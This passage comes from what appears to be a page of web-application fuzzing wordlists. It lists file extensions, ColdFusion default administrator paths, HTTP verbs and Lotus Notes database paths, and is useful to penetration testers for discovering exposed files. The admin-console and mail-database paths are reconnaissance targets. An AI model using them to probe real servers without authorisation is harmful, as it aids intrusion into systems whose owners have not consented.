.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
